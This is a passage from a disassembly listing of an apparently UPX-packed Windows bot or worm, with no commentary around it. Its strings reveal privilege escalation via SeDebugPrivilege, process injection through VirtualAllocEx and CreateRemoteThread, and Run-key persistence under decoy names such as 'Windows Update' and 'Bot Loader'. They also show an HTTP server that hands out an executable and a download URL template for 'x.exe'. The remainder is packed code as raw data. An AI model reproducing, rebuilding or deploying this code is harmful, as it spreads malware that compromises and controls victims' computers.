and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_30904C84 dd 1CEC8166h dword_30904C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_30901D39+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_30901D39+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_30901D39+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_30901D39+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_30901D39+8�o
; sub_30902383+132�o
align 10h
aUterm17 db 'uterm17',0 ; DATA XREF: sub_30901DC1:loc_30901EA6�o
; UPX0:30902322�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_30901DC1+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_30901DC1:loc_30901E08�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_30901DC1+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_30901DC1+18�o
align 4
dword_30904D38 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3090204F+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3090204F+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3090204F+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_3090204F+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3090230D�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_30902383+139�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_30902383+12B�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_30902383+124�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_30902383+117�o
align 4
aU17 db 'u17',0 ; DATA XREF: sub_30902383+105�o
aU16 db 'u16',0 ; DATA XREF: sub_30902383+F9�o
aU15 db 'u15',0 ; DATA XREF: sub_30902383+ED�o
aU14 db 'u14',0 ; DATA XREF: sub_30902383+E1�o
aU13i db 'u13i',0 ; DATA XREF: sub_30902383+D5�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_30902383+C9�o
aU12 db 'u12',0 ; DATA XREF: sub_30902383+BD�o
aU11 db 'u11',0 ; DATA XREF: sub_30902383+B1�o
aU10 db 'u10',0 ; DATA XREF: sub_30902383+A5�o
aU9 db 'u9',0 ; DATA XREF: sub_30902383+99�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_30902383+8D�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_30902383+81�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_30902383+75�o
align 4
aU14x db 'u14x',0 ; DATA XREF: sub_30902383+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_30902383+5D�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_30902383+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_30902383+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_30902383+3B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_30902383+22�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_309026E9+2D�o
align 10h
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_30902195+23�o
; sub_309029BD+5F�o ...
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_30902195+1C�o
; sub_30902A6B+87�o ...
align 10h
aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_309015C7+4F�o
; sub_30902B37+57�o ...
align 10h
dd 2 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_30902B37+32�o
aClient db 'Client',0 ; DATA XREF: sub_30902B37+BC�o
; sub_30902B37+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_30902B37+37�o
; sub_30902B37+75�o
align 10h
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_309029BD+4E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_309029BD+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_309029BD+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_309029BD+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_309029BD+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_309029BD+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_309029BD+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_309029BD+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_309029BD+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_309029BD+F�o
align 4
a1: ; DATA XREF: sub_30902B37+B7�o
unicode 0, <1>,0
dd 7 dup(0)
dword_30904FB8 dd 0 ; sub_30902195+80�w
dword_30904FBC dd 0 ; sub_3090169C+5B�o ...
dword_30904FC0 dd 0 ; sub_3090204F:loc_309020FD�r ...
dword_30904FC4 dd 68h ; UPX0:3090232D�w ...
dword_30904FC8 dd 0 ; sub_30902383+33�w
dword_30904FCC dd 0 ; sub_309026E9+20�r
dword_30904FD0 dd 30900000h ; UPX0:30902312�w
dword_30904FD4 dd 0 ; sub_3090169C+52�o ...
dword_30904FD8 dd 0 ; UPX0:30902798�w
word_30904FDC dw 0 ; DATA XREF: sub_30902536+3B�r
; sub_3090259A:loc_309025FB�r ...
align 10h
dword_30904FE0 dd 0 ; sub_30902B37+110�w
align 20h
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00005000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 30905000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_30905000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:30906B11�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 4D000201h
dd 40D47Eh, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 10h, 5000000h, 23h
dd 10h, 40h, 309000h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 50h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 4000000h, 8C00002Dh, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 26000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 0E4000000h, 0Fh, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 0C000040h, 0C300002Fh, 4D000044h
dd 164868A0h, 8695B9AEh, 3D7D0302h, 9F6801A7h, 0BB21B736h
dd 4A20E676h, 5AB7CC3Ah, 0E43DB91Bh, 7684E066h, 0F42A706Ah
dd 7364796h, 0C8608CA4h, 97640A5Eh, 1939F0D9h, 2800847Ah
dd 4B003FA2h, 2ECDCB59h, 0C8B26C3Ch, 0A723BD98h, 167E2B2h
dd 3E500FDCh, 7EE8685Ch, 0ACA70DFCh, 0D328C00Dh, 431B138Ch
dd 0E54008C9h, 0EDCD2484h, 0DB0C7A04h, 0B212C5F8h, 0D62D5221h
dd 39EDB1Ch, 402EFDD9h, 4C7012DEh, 2719F844h, 40BCC06Ch
dd 1BDE5044h, 0D6336F5h, 94B71E10h, 0EEB6970Dh, 812193BFh
dd 0E87CACF9h, 1624A580h, 0B0250600h, 687E9F25h, 1C9D1C52h
dd 99DE1276h, 96F47258h, 650AEF36h, 4B1E7C6Ah, 7BC89C36h
dd 91BE490Ch, 0C93C3E49h, 90E1547Bh, 0DD92EDCCh, 8C9FE924h
dd 0CF782449h, 364052EDh, 0F88248CCh, 3331150Ch, 66F4C2C2h
dd 8707A02h, 9A85D0E8h, 0F4455E74h, 180B9D5Fh, 1C22F89Ah
dd 7F24E46Dh, 0FB5D07A8h, 5A4353Eh, 571282F8h, 0B0ACBF37h
dd 5A745781h, 74F80E14h, 8B74684Bh, 9BA09312h, 7E3D749Fh
dd 0FE709696h, 0A041209Ah, 73FC55FFh, 0FD859EDh, 50E4B9E8h
dd 0D59628ACh, 0E5BABF4h, 551802F0h, 3B0009F8h, 8CB303B1h
dd 0F47558E4h, 0C8718725h, 8B1807C1h, 7AD0D00Dh, 6FFDDFEDh
dd 3C418B00h, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h
dd 92FB818Ah, 1C68D8B4h, 9765D81Bh, 0F0C6966Ah, 868A301h
dd 0EC706312h, 0ED74ECF0h, 1110D70Dh, 9D1B0E82h, 14096C9Ah
dd 8B4DC2F4h, 0F8E1645Dh, 18185051h, 5A2A6897h, 1B15283Ah
dd 0CA115DB0h, 0D1AAEB03h, 0EB346B58h, 76AB57C4h, 599BB60Ch
dd 7C7DF055h, 3E4574CFh, 0EA5D4B3Eh, 500251F0h, 35ACEF53h
dd 0B84F07C4h, 0FAD68C27h, 6AD06A17h, 7789FF53h, 0C73BEC55h
dd 0EB290574h, 0C785CD1Bh, 684C90D8h, 0E59F60Eh, 0D5EB05FCh
dd 7B9CD0Ch, 49EF7408h, 0E86E1909h, 51513021h, 310F6000h
dd 144B2269h, 250D2D1Ah, 0B42BAEB8h, 0B1AFDD0Dh, 0FECB213h
dd 0B1133AE9h, 0F9C22D59h, 12BCB66Ah, 3C9EDC4Bh, 0A8500C80h
dd 614B7D50h, 2C50774Dh, 20195DC0h, 0A44598B7h, 7CAC437Ch
dd 51B8B024h, 0E2AA148Bh, 0AC96177Eh, 1A67FFFEh, 8861C280h
dd 3B461E14h, 80E97CF7h, 5D003B24h, 9ABADB78h, 2E445C54h
dd 57AC5A5Fh, 0A6030356h, 0A066DBCEh, 0B112732Fh, 0F0DCA5DDh
dd 56501950h, 8078AA00h, 77ACDC26h, 0F41EC495h, 71ED6DD1h
dd 0CFA6849h, 0D9C7FFF0h, 8936D32h, 2ACC3434h, 35AE4C2Eh
dd 0A753DB3h, 20BC500Ah, 27C2C01Ah, 0C6541874h, 3B7FB807h
dd 0B5BE3901h, 0C40452Fh, 801008Bh, 24448D51h, 0B36C265Fh
dd 113021D8h, 245903D3h, 9F09DD0Eh, 0BBCC1507h, 2FC82007h
dd 8678FF6Ch, 0F8C8E433h, 8510E7C1h, 0CF361A0Bh, 20087C8h
dd 33125D8Bh, 8E01C8E0h, 3393D2C4h, 951D5920h, 0B4B4C653h
dd 11DAAF66h, 25214537h, 4D6D3C3h, 0E7198370h, 0CCDB5ADh
dd 0F017B3C8h, 37359541h, 6899DC66h, 6C683D98h, 4FC044B7h
dd 63362C0Dh, 4D54FE47h, 8598BAA5h, 54DA149Bh, 81BF007Ch
dd 0A134775Fh, 7900B933h, 0C13BC72Bh, 0EDEE0272h, 0C18BDD76h
dd 0A1292BE1h, 0C70318B8h, 0C4B4AC23h, 3D9D52DFh, 6A117223h
dd 1B46F878h, 0EB4F6785h, 50E113C4h, 9EC9E446h, 1ED4112Dh
dd 3C681594h, 0DDC9AC59h, 3868030Bh, 0ACC73C97h, 533AB6B3h
dd 83525354h, 0D188FC12h, 0C29824D0h, 0DB04F404h, 57303347h
dd 0D0B1C8F4h, 86B6A7DDh, 0BF4ECDD9h, 68066068h, 0DDEEDB6h
dd 1D898068h, 55182784h, 0ADC014ECh, 0D489753Dh, 536200F2h
dd 0D26B027Bh, 3A01B304h, 0CD7780BCh, 0C54A39Ah, 0D5741A4Dh
dd 2F28D9E1h, 0CA3DCCDh, 9DE9784Ch, 0A4FEA336h, 565153FCh
dd 6B674B62h, 68D83A86h, 0FBE32656h, 5EF93370h, 10C25819h
dd 0A8499A05h, 56C05E69h, 0B7E80C4Bh, 895E93BFh, 50DEC5Dh
dd 1FFF25FFh, 0A1C33A04h, 0A3DD837Fh, 0E77443CCh, 84CC8A1Fh
dd 50DF74C9h, 0F57C666Bh, 3042EA26h, 90AFA540h, 646516E9h
dd 5F7B440Ch, 0A6BE8FEAh, 1FD814F8h, 4F689E48h, 2F670A20h
dd 1F0F09C7h, 0CF53E2EBh, 0B30455Fh, 904312E6h, 66DA7001h
dd 3CAEEBDDh, 11D6B033h, 3CD8023Eh, 0D6E61E98h, 68B4803Ah
dd 8CC115B0h, 0D0A3AB6Dh, 0C37C74E0h, 7B80EC66h, 0E41AC4A3h
dd 6652B73Dh, 4504ECF7h, 350D29E0h, 1AB91904h, 1BFB3826h
dd 23836833h, 0EBE4BD13h, 27DAFD8Dh, 997F1386h, 44C83569h
dd 3049C870h, 60403958h, 0B1C3AB90h, 4468D012h, 7AD89CF3h
dd 6C3816CDh, 0FC1543A3h, 0D72BFEC0h, 1BF61868h, 342404C7h
dd 640640Bh, 1C242C64h, 6406406h, 0C8080C14h, 0E4F3480h
dd 190004F6h, 0FC0E4B90h, 1F4F84Dh, 0EC019019h, 190190E8h
dd 0DCE0E490h, 0F42FC1F3h, 748D3959h, 4DD46839h, 0C989A8B1h
dd 0CC3D26D8h, 73C4064Dh, 0DD261217h, 0AA0BC0Dh, 7E472E49h
dd 6857D512h, 50F2195h, 0E0F1169Ch, 2745C822h, 876B9448h
dd 65D859F4h, 18FE5714h, 0EBA21388h, 824F0A09h, 311570E3h
dd 0C6D6CB5h, 695B091Ch, 0C2ABA480h, 0B37F8047h, 0B458A51h
dd 1EBB70A5h, 32FF7B0Eh, 4C3A52DBh, 38314D05h, 0ADF108FEh
dd 88253F5Dh, 7A90B5Dh, 35B70FCEh, 19FC06DCh, 99BAA4E0h
dd 0D603FEF7h, 0E32D97A3h, 80C3FE7Fh, 0BD72FFFBh, 7662C05Eh
dd 6ACC09D9h, 33750A5Fh, 1C2B6D68h, 84F5832h, 0D8040A81h
dd 0E201EDACh, 75950B09h, 63B04DA4h, 0D00F7586h, 0F2322536h
dd 8996CED6h, 0FF84323Dh, 86DFD703h, 81430F5Ah, 9F9C29FBh
dd 355D875Fh, 8426358Bh, 9E0C737Bh, 0A260D32Bh, 5B062FECh
dd 73B6DF3Ch, 0FEFF04FDh, 362D3CFCh, 887FCD7Eh, 8BC66BF7h
dd 0D9F93BA9h, 0DCB0EC59h, 0A0A33EAAh, 12CF9E57h, 572F3B01h
dd 59F8DC9Ch, 6C8712B7h, 0C1FF9A13h, 47EE75B3h, 0F812F0D6h
dd 0A6271068h, 0C0D3BED3h, 9E61E0E0h, 0A9337084h, 4B098996h
dd 0C81E4E56h, 0B15D3019h, 0B05C708Fh, 7AF07CCFh, 0CC4052F8h
dd 8301B90Bh, 68B0036Fh, 10414E4Ch, 0F0097B11h, 42BA2D6Eh
dd 80C60F6Ch, 9361600Bh, 0A43FDFEBh, 57935655h, 59DE0331h
dd 19E6D48Ah, 0E1A19871h, 1F0CA551h, 1BBBF4FDh, 14683624h
dd 0BF66753h, 38506A02h, 66816FF6h, 5325DD8h, 740096D2h
dd 35CC0918h, 711BD1Eh, 14190510h, 141C2776h, 6D84F00h
dd 6DAAE516h, 0C34FC207h, 0D5530D74h, 861051C7h, 17088407h
dd 18244C39h, 1B61DB3Ah, 0ED85EDFAh, 22AB117Eh, 144D2C26h
dd 0DDB064EFh, 0A2059661h, 750DF2EBh, 96E841DAh, 0DDEB65h
dd 23333F68h, 212E0583h, 0DF150C9Ch, 0AF0588D9h, 1408106Eh
dd 421C1BA9h, 182F5135h, 0D8D80256h, 183D90B2h, 3D563EF6h
dd 5C6311CEh, 182ADC74h, 0B74B2C61h, 2050D905h, 0FC081810h
dd 39C0B62h, 550F5EB0h, 575AC68Bh, 0AE759A2h, 182C562Eh
dd 53CEC990h, 27005556h, 845ACE59h, 0C520A2Bh, 9262CF04h
dd 0B55D0C03h, 89E20128h, 0DE5320C3h, 0F6F44E27h, 8E40B713h
dd 1E3C3A94h, 794E365Ch, 3E21D6F7h, 0F8DF0A38h, 0C960A433h
dd 687AEF16h, 7AD86035h, 0FAF66811h, 1B201210h, 0A604F77Ch
dd 477DF21Ch, 11E748Dh, 60FFFC81h, 1F563D02h, 0B5FF1C24h
dd 97905CE0h, 0FF4B457Ah, 0E1521F0Fh, 8D999B0h, 0EC465060h
dd 99D03876h, 0B789BDABh
dd 0E6E48038h, 0D00F5ED8h, 7C03C757h, 68D40624h, 72391C8Eh
dd 44DC50D8h, 30E43CE0h, 472391E7h, 0CEC18E8h, 0D14EF0F0h
dd 0F4CC1934h, 0A7DB0E0h, 0E26163BFh, 0F8BE637Ch, 51A28B7Dh
dd 3C18A164h, 3608B3C8h, 7571CBD8h, 1D200E17h, 9E9AA64Dh
dd 83370108h, 975B6A2h, 0B0448A46h, 0F4697881h, 74B08C47h
dd 5874AD09h, 81636A88h, 0AE598BB3h, 1BA184BBh, 3FC17A2Fh
dd 8303E083h, 9D5605C0h, 4A8B86B9h, 10C8CD52h, 186E459Dh
dd 0D6D73D11h, 0EE661C3Dh, 38140E26h, 0EF4250E1h, 0A161982Ch
dd 0CA402040h, 3E684B7Ch, 0B306AEC6h, 0D885CC59h, 25D31441h
dd 0F454CFA1h, 0E007B701h, 0F40962Bh, 88E76F84h, 0C5173EC1h
dd 14C7481Fh, 6DC017F7h, 52E02558h, 1D6AE0B2h, 71B8BF50h
dd 0C21840F5h, 743F51DCh, 0E8185737h, 0BB0A3060h, 1983CC77h
dd 52D1F628h, 0BC10F453h, 0CDFB9A53h, 0B1383D62h, 0CE590FEBh
dd 0F6CE8105h, 0EB68B632h, 96C0E374h, 0BB2665E2h, 0B3739868h
dd 0D4DC0D65h, 0DB9BB46h, 0B40D60B3h, 5EE2671Ah, 0EC6F4C12h
dd 0E74957A4h, 3BBBC631h, 90CCB64h, 0E0AE2CFDh, 118B790Bh
dd 0EB0C4807h, 0D1880E15h, 9CD6062h, 2BA1EA18h, 0C5C5053h
dd 0C5B34433h, 684FF83Eh, 11136A76h, 42A66E40h, 0FF00CCDFh
dd 0F8052105h, 199EFA10h, 1BF0F479h, 0DF7D5100h, 8D9A91A8h
dd 8114720Bh, 0B72D0BE9h, 4FB1E25h, 73170185h, 0C4312BECh
dd 23E18B0Ch, 8BD5BB5Bh, 5004E908h, 5C644353h, 63636100h
dd 495805h, 22C02A00h, 4BF1F110h, 20628F3h, 41535224h
dd 0FFFF8031h, 1BF4B77h, 838DF501h, 0EC527911h, 0F63AE42Ah
dd 0EA9B49E7h, 21AFBEE0h, 0FFFFFFFFh, 95447EDBh, 32615E1Ah
dd 6A1F85A0h, 94FF949Fh, 26A68439h, 1DCE358Fh, 0BC9A55Ch
dd 72657AB2h, 407FFFFFh, 7A6F4DABh, 616C6C69h, 302E342Fh
dd 6F632820h, 7461706Dh, 0FFF6B7FFh, 656C6269h, 534D203Bh
dd 36204549h, 69570915h, 776F646Eh, 544E2073h, 0FBA81776h
dd 312E3520h, 0BEE43429h, 104D400h, 0E79E7BC4h, 0A00EB47Bh
dd 4748090h, 0EFBE79E7h, 9580E68h, 6F743C48h, 0D49EC9B2h
dd 22204530h, 86FF4A10h, 309E7Ch, 631340F8h, 6C2E7676h
dd 72DB6B7Bh, 777E75h, 6C646507h, 0FF0F6597h, 666DFEF6h
dd 657365C1h, 68637261h, 6F721F0Eh, 63786F62h, 7376FF68h
dd 676E61E5h, 74651FD2h, 2E64720Ch, 7A6962h, 0B7C8DB0Bh
dd 68632861h, 0C6D616Bh, 0DB2D0674h, 78B17376h, 6C060024h
dd 37620E6Fh, 0DB7DED6Bh, 76264766h, 742E7A02h, 1111B76h
dd 74FB185Bh, 6E2E706Fh, 730F6917h, 0DB01FE27h, 788D330Ah
dd 7564610Fh, 652D746Ch, 1766FDB6h, 8072694Bh, 0A66E6F33h
dd 15804E73h, 2E74EDBEh, 694F6762h, 0B6FF3267h, 7800FBF6h
dd 6A2C6177h, 0AD6262h, 66617A9Bh, 6DF09161h, 5D2EA867h
dd 0AF5C2365h, 0FFFEDDBh, 64636261h, 68676665h, 6C6B6A69h
dd 71C56E6Dh, 0F975F772h, 76F8DFFFh, 7A797877h, 43424154h
dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 61FF5150h, 55547FB4h
dd 59585756h, 68231B5Ah, 3A707474h, 0CDF82F2Fh, 7325D81Dh
dd 97652F0Bh, 7068702Eh, 7DBF3D3Fh, 0F3D0E5Bh, 6E637326h
dd 69266406h, 8376666Eh, 3BBEDB94h, 2637313Dh, 0A01B7413h
dd 7B5DFDEBh, 313D58B0h, 1A83732h, 30383A31h, 7F652F30h
dd 0DFF646C0h, 0DFE800DFh, 66C9335Dh, 0EDB7FFB9h, 8D01EEFFh
dd 0FE8B0575h, 993C068Ah, 2C064607h, 99344630h, 0E2470788h
dd 1A17FBEDh, 0E80AEBF4h, 65DFAEDAh, 93712E67h, 0F701C999h
dd 12FF6FFFh, 0FD91BDFDh, 72C10716h, 0FD42AA68h, 10FDAA66h
dd 0A91C14BAh, 0D8FF1A98h, 0F3C9FBADh, 8608F198h, 10C07102h
dd 37CB5F90h, 0C9965992h, 1CD9FD87h, 0E4143A78h, 0A7D7157h
dd 0CE45713Ah, 0F3F6DF7Dh, 8904F19Dh, 9C04F109h, 0C7764011h
dd 67B391FEh, 10F0E3F3h, 0B20BDC1Ch, 0C99B6059h, 0F7FB1EC7h
dd 14D90125h, 0CA17A104h, 8D2B9E71h, 230BD968h, 0AD9161CBh
dd 1D96E21Ah, 0B6CF2811h, 50B2F6B7h, 149900C8h, 255557DCh
dd 0F6A44E12h, 0C0F6EF6Fh, 99491291h, 54F7EDh, 0CA3AC414h
dd 1C3B71CBh, 7EEEC3D9h, 21E424FFh, 0CDCDCF1Ah, 812C668Fh
dd 0B64FFDDBh, 0B0FB1E3Fh, 0CDC383B8h, 0C9A85D12h, 0D93F1DCBh
dd 0AD2537CEh, 485A0B24h, 0FF6596A6h, 14C0B264h, 0A7294C1Bh
dd 0BA9CF3EBh, 0D9FBECFFh, 0F43416E9h, 0FCF57126h, 133BF90Eh
dd 0FF4629EFh, 6BFBBB37h, 66DE5F37h, 0AEA8EC47h, 0C5B70116h
dd 0ECE9EDFFh, 0B087DDE9h, 0FCB7FDF7h, 0CA012CE1h, 5AFCFCF5h
dd 0DFFFF2F2h, 0F7EBFCFEh, 0ABAAF5FCh, 0F934C7D6h, 25B459AAh
dd 0C9662A2Ah, 819093ACh, 0B3F85FB7h, 639D90FFh, 71CDC983h
dd 19BF3092h, 0D9145135h, 91720A95h, 76107FFFh, 0EBC8712Ah
dd 0D512A5D2h, 529AE180h, 8D146FAAh, 7F6F9A2Ah, 0B9C8FDA3h
dd 4A9A8B12h, 0AB9EC347h, 0A319DB9Bh, 0A26CEC20h, 0FFFEDFFFh
dd 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h, 1FBDC812h, 0EB8D2E96h
dd 9A85D812h, 99D125Ah, 0E68584FFh, 0F8105A9Ah, 4922D096h
dd 0FEFD7F66h, 0B7B76D12h, 5AA987DDh, 850295C2h, 91048212h
dd 0DCF7CB5Ah, 0CFA033FCh, 53FF857Fh, 1872424Dh, 0FA5FC853h
dd 0FEFF84E7h, 50020062h, 54458343h, 0ADF64F57h, 4B52FFF1h
dd 4F525020h, 4D415247h, 17CD3120h, 4D4E414Ch, 4875A902h
dd 66AB0AB1h, 0DB4BB715h, 6B035BADh, 7075BB67h, 611A330Eh
dd 75BA5B0Fh, 32234D27h, 32322158h, 69AC2E32h, 0D6319533h
dd 323C2018h, 0E464AD8Bh, 773A419h, 42EDF60Dh, 23FF0C52h
dd 0A110400h, 0ED6F2014h, 0D4058D46h, 4C0069D0h, 5053534Bh
dd 443F8248h, 88297B7h, 0BB94AE0h, 57F6FCh, 64006E24h
dd 756F00h, 6F643A73h, 3074B62Fh, 398C0901h, 36233500h
dd 1D4B6E60h, 0DA00072Eh, 0E79019ABh, 0DA200844h, 49C19D57h
dd 39F26h, 0C80F46F2h, 47238360h, 64007h, 73FFE806h, 1F011023h
dd 0E0888A15h, 4F0048h, 0FFFEC044h, 6A19FE8Dh, 49E4F27Ah
dd 30AF281Ch, 67107425h, 429EE153h, 0DF5C89BEh, 4003075h
dd 5B5CD75Eh, 5ABD075Ch, 1B615C08h, 4DEBB91Bh, 36072Eh
dd 30772E38h, 0C4CD9D1Bh, 0EC0049B6h, 3F00E843h, 873C807Ch
dd 8A26463h, 907B04DCh, 1640B6FFh, 0DEDE00FFh, 16000E00h
dd 2602019Fh, 90984DFh, 3192840h, 0BEE1A360h, 0D96C8B11h
dd 1470D374h, 9BD65DF2h, 256B9C2Ah, 0B6D9EC0Eh, 480E109Fh
dd 0E7541B04h, 13EBAEB6h, 63265A54h, 0C75C2259h, 0FF9A41CBh
dd 876545DCh, 30B0005h, 0FFFF4810h, 10B8EF62h, 50B0EB8h
dd 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F63FF0BEh, 0F52ED94Fh
dd 8A885D5Fh, 11C91CEBh, 2B3CE89Fh, 3E604810h, 0D1CBD917h
